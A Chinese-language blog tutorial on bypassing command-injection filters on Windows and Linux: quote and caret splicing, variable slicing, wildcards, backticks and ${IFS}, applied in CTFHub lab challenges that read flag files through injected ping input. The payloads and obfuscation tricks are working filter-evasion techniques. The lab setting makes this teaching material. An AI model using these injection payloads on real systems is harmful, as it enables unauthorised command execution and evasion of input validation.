【RCE剖析】从0到1讲解RCE漏洞绕过，Windows与Linux的RCE漏洞绕过方式总结

原创于 2025-09-02 15:21:02 发布 · 629 阅读

28 ·

CC 4.0 BY-SA版权

文章标签：

#windows #运维 #web安全 #黑客技术 #网络安全 #渗透测试 #计算机

前言

本文讲解了windows/linux的常见命令以及命令执行漏洞的绕过方式，靶场环境为ctfhub，分别有命令注入、cat过滤、空格过滤、过滤目录分隔符、运算符过滤，这几种绕过方式

Windows

我们在windows命令行中执行命令的时候，是不区分大小写的

C:\>WHOAMI   
yv\administrator

在命令行中可以有无数个"

C:\>wh""""oami
yv\administrator

C:\>wh""""""""""""""""""""""""""""""oami
yv\administrator

不能有两个连续的^

C:\>whoa^mi
yv\administrator

C:\>whoam^^i
'whoam^i' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

C:\>who^a^m^i
yv\administrator

在命令中如果 " 在^之前，此时"的数量必须为偶数

C:\>who""a^mi
yv\administrator

C:\>who"a^mi
'who"a^mi' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

在命令中"在^之后，且带有参数，则”也需要带有偶数

C:\>n^et" user
'net" user' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

C:\>n^et"" user

\\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
mysql                    WDAGUtilityAccount       www
命令成功完成。

也可以使用()对命令进行包裹

C:\>(whoami)
yv\administrator

C:\>(n^et"" user)

\\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
mysql                    WDAGUtilityAccount       www
命令成功完成。

()的数量不设上限

C:\>(((whoami)))
yv\administrator

使用变量

简单拼接

%%局部分开每个变量

C:\>set cmd1=who

C:\>set cmd2=am

C:\>set cmd3=i

C:\>%cmd1%%cmd2%%cmd3%
yv\administrator

变量拼接方式二

C:\>set cmd1=who

C:\>set cmd3=i

C:\>%cmd1%am%cmd3%
yv\administrator

变量拼接方式三

C:\>set cmd1=wh"""o

C:\>set cmd3=i"""

C:\>%cmd1%am%cmd3%
yv\administrator

变量拼接方式四 ^

C:\>set cmd1=wh""""o    # 这里需要偶数，因为在变量拼接结果中有 ^ 

C:\>set cmd3=i"""    # 后面正常多少个 " 都行  

C:\>%cmd1%a^m%cmd3%
yv\administrator

含有参数的命令，net user

C:\>set cmd1=s""er

C:\>set cmd2=t u

C:\>set cmd3=n^e

C:\>%cmd3%%cmd2%%cmd1%

\\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
mysql                    WDAGUtilityAccount       www
命令成功完成。

一次性执行多条命令

C:\>cmd /C "set cmd1=s""ser && set cmd2=t u && set cmd3=n^e && %cmd3%%cmd2%%cmd1%"

\\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
mysql                    WDAGUtilityAccount       www
命令成功完成。

Windows环境变量切分

先设置一个变量

C:\>set cmd=whoami   

C:\>%cmd%    
yv\administrator

这个0,1表示的数组切片，代表前后切片的索引

C:\>set cmd=whoami

C:\>echo %cmd:~0,1%
w

C:\>echo %cmd:~0,4%
whoa

也可以为负数，负数表示从右边开始数第几个

C:\>set cmd=whoami

C:\>echo %cmd:~-4,4%
oami

C:\>echo %cmd:~-6,4%
whoa

当然也能直接向外部写一个php一句话木马

在这里插入图片描述

image-20240812113353901

检查是否存在

在这里插入图片描述

for循环执行命令

C:\>cmd /V:ON /C "set kpx=awlh2im,xiaoyu&& for %G in (1,3,-3,0,6,5) do set lq=!lq!!kpx:~%G,1!&& if %G==5 !lq:~4!"

C:\>set lq=!lq!!kpx:~1,1!  && if 1 == 5 !lq:~4!

C:\>set lq=!lq!!kpx:~3,1!  && if 3 == 5 !lq:~4!

C:\>set lq=!lq!!kpx:~-3,1!  && if -3 == 5 !lq:~4!

C:\>set lq=!lq!!kpx:~0,1!  && if 0 == 5 !lq:~4!

C:\>set lq=!lq!!kpx:~6,1!  && if 6 == 5 !lq:~4!

C:\>set lq=!lq!!kpx:~5,1!  && if 5 == 5 !lq:~4!
yv\administrator

Linux

linux中是区分大小写的

┌──(root㉿251ebe86465a)-[/]
└─# LS
LS: command not found

┌──(root㉿251ebe86465a)-[/]
└─# Ls
Ls: command not found

运算符;表示连续指令，即使前面那条命令报错，后面也会接着执行

┌──(root㉿251ebe86465a)-[/]
└─# LS;whoami
LS: command not found
root

& 用于后台执行命令，这个可能看不出来

┌──(root㉿251ebe86465a)-[/]
└─# ls&wHoami
[1] 59
archive-key.asc  boot  etc   lib    lib64  mnt  proc  run   srv  tmp  var
bin              dev   home  lib32  media  opt  root  sbin  sys  usr
Command 'Whoami' not found, did you mean:
  command 'whoami' from deb coreutils
Try: apt install <deb name>
[1]+  Done                    ls --color=auto

我们使用ping 127.0.0.1 & whoami，这条命令会将ping放在后台执行，这个时候你没有设置ping的次数，就会一直执行下去，停止不了，而whoami已经执行完毕了。

┌──(root㉿kali)-[/usr/local]
└─# ping 127.0.0.1& whoami
[1] 4508
root

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=5.80 ms
┌──(root㉿kali)-[/usr/local]
└─# 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.593 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.058 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.045 ms
--------之后将会一直运行下去，也停止不了。。。。

&&连接两个指令的时候，要保证命令两个命令都能正常执行，否则一个错，就执行不了了

┌──(root㉿251ebe86465a)-[/]
└─# ls&&whoami
archive-key.asc  boot  etc   lib    lib64  mnt  proc  run   srv  tmp  var
bin              dev   home  lib32  media  opt  root  sbin  sys  usr
root

┌──(root㉿251ebe86465a)-[/]
└─# LS&&whoami
LS: command not found

|管道符：用于将一个命令的输出作为另一个命令的输入。它允许两个或多个命令之间传递数据。

例如，我获取这个/data路径的下的所有包含boo的文件

┌──(root㉿251ebe86465a)-[/data]
└─# ls | grep '*boo*'
boot

||逻辑运算符：如果||左边的命令执行失败（返回非零退出状态），那么||右边的命令将会被执行。执行成功一个命令后，后面的苏哦有命令都不会执行。

┌──(root㉿251ebe86465a)-[/]
└─# ip addr || wHoami || ls
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

转义字符\

┌──(root㉿251ebe86465a)-[/]
└─# who\ami
root

''，()，$，``

┌──(root㉿251ebe86465a)-[/]
└─# who''ami
root

┌──(root㉿251ebe86465a)-[/]
└─# (whoami)
root

┌──(root㉿251ebe86465a)-[/]
└─# (who''ami)
root

┌──(root㉿251ebe86465a)-[/]
└─# `(echo whoami)`
root

┌──(root㉿251ebe86465a)-[/]
└─# $(echo whoami)
root

命令引用

┌──(root㉿kali)-[/data]
└─# t=l;j=s;$t$j             #相当于执行了 ls 
谷歌插件  GitHack  miku

linux特有变量

$1，$*，$@，$n这个n表示除0以外的任意数字，都可以作为系统命令绕过的方式

┌──(root㉿kali)-[/data]
└─# who$2ami
root

┌──(root㉿kali)-[/data]
└─# who$4ami
root

┌──(root㉿kali)-[/data]
└─# who$*ami
root

┌──(root㉿kali)-[/data]
└─# who$@ami
root

┌──(root㉿kali)-[/data]
└─# who$0ami
who-zshami：未找到命令

linux通配符

我们以执行whoami这个命令来进行测试

┌──(root㉿kali)-[/etc/docker]
└─# whereis whoami
whoami: /usr/bin/whoami /usr/share/man/man1/whoami.1.gz

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam*
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam?
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/wh?am?
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/????mi
root

┌──(root㉿kali)-[/etc/docker]
└─# /u?r/b?n/????mi
root

┌──(root㉿kali)-[/etc/docker]
└─# /*/b?n/????mi
root

Linux中命令中的命令

虽然会报错，但是命令也会正常执行

┌──(root㉿kali)-[/etc/docker]
└─# `666666`
666666：未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# 666666`whoami`6666
666666root6666：未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# `6666`whoami`6666`
6666：未找到命令
6666：未找到命令
root

┌──(root㉿kali)-[/etc/docker]
└─# 6666`whoami`6666
6666root6666：未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# w`sfdawfewa`ho`sajfdkljas`am`sdjflk123`i
sfdawfewa：未找到命令
sajfdkljas：未找到命令
sdjflk123：未找到命令
root

┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf}oam${ddkjdld}i
root

┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf242341}oam${ddkjdld234232}i
root

linux环境变量切割

查看环境变量

┌──(root㉿251ebe86465a)-[/]
└─# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

查看环境变量的长度

┌──(root㉿251ebe86465a)-[/]
└─# echo ${#PATH}
60

分割环境变量

┌──(root㉿kali)-[/etc/docker]
└─# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools

┌──(root㉿kali)-[/usr/local]
└─# echo ${PATH:0:10}
/usr/local

┌──(root㉿kali)-[/usr/local]
└─# echo ${PATH:0:1}
/

靶场练习CTFHUB

在这里插入图片描述

使用&&符号，没有获取到想要的结果，因为&&在前一个命令没有执行结束的时候，是不会执行后面的命令的。

在这里插入图片描述

当然还有种思路就是指定次数，使用-c参数，这里是没有效果的

┌──(root㉿kali)-[~]
└─# ping -c 2 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.489 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.106 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 0.106/0.297/0.489/0.191 ms

在这里插入图片描述

;绕过

┌──(root㉿kali)-[~]
└─# ping -c 2 127.0.0.1;whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.558 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1008ms
rtt min/avg/max/mdev = 0.047/0.302/0.558/0.255 ms
root

在这里插入图片描述

使用&也可以得到结果，通过将ping命令放到后台执行，后面的结果也会执行

在这里插入图片描述

    [1] => /sys/devices/platform/serial8250/tty/ttyS2/flags
    payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS2/flags
    
    [2] => /sys/devices/platform/serial8250/tty/ttyS0/flags
    payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS0/flags
    
    [3] => /sys/devices/platform/serial8250/tty/ttyS3/flags
    payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS3/flags
    
    [4] => /sys/devices/platform/serial8250/tty/ttyS1/flags
    payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS1/flags
    
    [5] => /sys/devices/virtual/net/tunl0/flags
    payload：127.0.0.1 & cat /sys/devices/virtual/net/tunl0/flags
    
    [6] => /sys/devices/virtual/net/lo/flags
    payload：127.0.0.1 & cat /sys/devices/virtual/net/lo/flags

这些payload都给你们试过了，没有flag

不断执行命令，找到这个web目录中有一个数字.php查看即可

在这里插入图片描述

得知payload

127.0.0.1 & cat /var/www/html/17165225371506.php

查看源码

在这里插入图片描述

过滤cat

题目：过滤了cat命令之后，你还有什么方法能读到 Flag?

查看目录，他换了个名字

在这里插入图片描述

没有cat那么在linux中还有这样几个命令

tac命令是cat命令的反向操作，它会按行读取文件内容，但会以相反的顺序输出。这意味着文件的最后一行将首先显示，而第一行将最后显示。

127.0.0.1 &tac /var/www/html/flag_9902871730290.php

less命令与more命令类似，也是用于分页显示文本文件的内容，但less提供了更多的导航选项，如向前翻页、向后翻页、搜索文本等。

127.0.0.1 &less 5 /var/www/html/flag_9902871730290.php

head命令用于显示文件的开头部分，默认显示前10行，但可以通过选项指定显示的行数。

127.0.0.1 &head 5 /var/www/html/flag_9902871730290.php

tail命令用于显示文件的末尾部分，默认显示最后10行，与head命令相对应。它还可以用于实时跟踪文件的新增内容。

127.0.0.1 &tail 5 /var/www/html/flag_9902871730290.php

nl命令与cat -b命令相似，用于显示文件内容并在每行前加上行号，但nl提供了更多的格式化选项。

127.0.0.1 & nl /var/www/html/flag_9902871730290.php

awk是一个强大的文本处理工具，虽然它主要用于模式扫描和处理语言，但在某些情况下，可以使用awk命令以类似于cat的方式显示文件内容，同时添加额外的文本处理功能。

127.0.0.1 & awk '{print}' /var/www/html/flag_9902871730290.php

more命令用于分页显示文本文件的内容，用户可以通过按空格键翻页，按b键回退，按q键退出。虽然它主要用于分页查看，但在逐页查看文件内容时，与cat命令直接显示整个文件内容的方式形成对比。

127.0.0.1 & more /var/www/html/flag_9902871730290.php

过滤空格

分析源码，使用preg_match_all函数检查变量$ip中是否包含空格。

在这里插入图片描述

空格的绕过方式一般有(针对于本题来讲)

1、${IFS}代替空格

127.0.0.1&ls${IFS}/var/www/html/

2、%09相当于tab键

127.0.0.1&ls%09/var/www/html/

3、大括号{}

127.0.0.1&{ls,/var/www/html/}

4、重定向字符> <>

举例

┌──(root㉿kali)-[/data]
└─# ping -c 1 127.0.0.1;ls<>-l
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.701 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.701/0.701/0.701/0.000 ms
谷歌插件  GitHack  -l  miku

payload：127.0.0.1&ls<>/var/www/html/

经过测试，上面四种仅有${IFS}成功

在这里插入图片描述

完整payload

127.0.0.1&cat${IFS}/var/www/html/flag_172742853821990.php

在这里插入图片描述

过滤目录分隔符

题目：这次过滤了目录分割符 / ，你能读到 flag 目录下的 flag 文件吗？

在这里插入图片描述

直接使用ls查看目录，没有东西

在这里插入图片描述

试试%2F

127.0.0.1 & ls %2Fvar%2Fwww%2Fhtml

在这里插入图片描述

那我们直接ls

在这里插入图片描述

使用cd和;进行多行命令执行即可，一级目录一级目录的cd即可

127.0.0.1;cd flag_is_here;cat flag_31328570616525.php

在这里插入图片描述

过滤运算符

题目：过滤了几个运算符, 要怎么绕过呢？

分析源码，过滤了运算符，但是也没完全过滤，少了个;

在这里插入图片描述

;即可

127.0.0.1;cat flag_5393398119154.php

在这里插入图片描述

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，请看下方扫描即可前往获取

在这里插入图片描述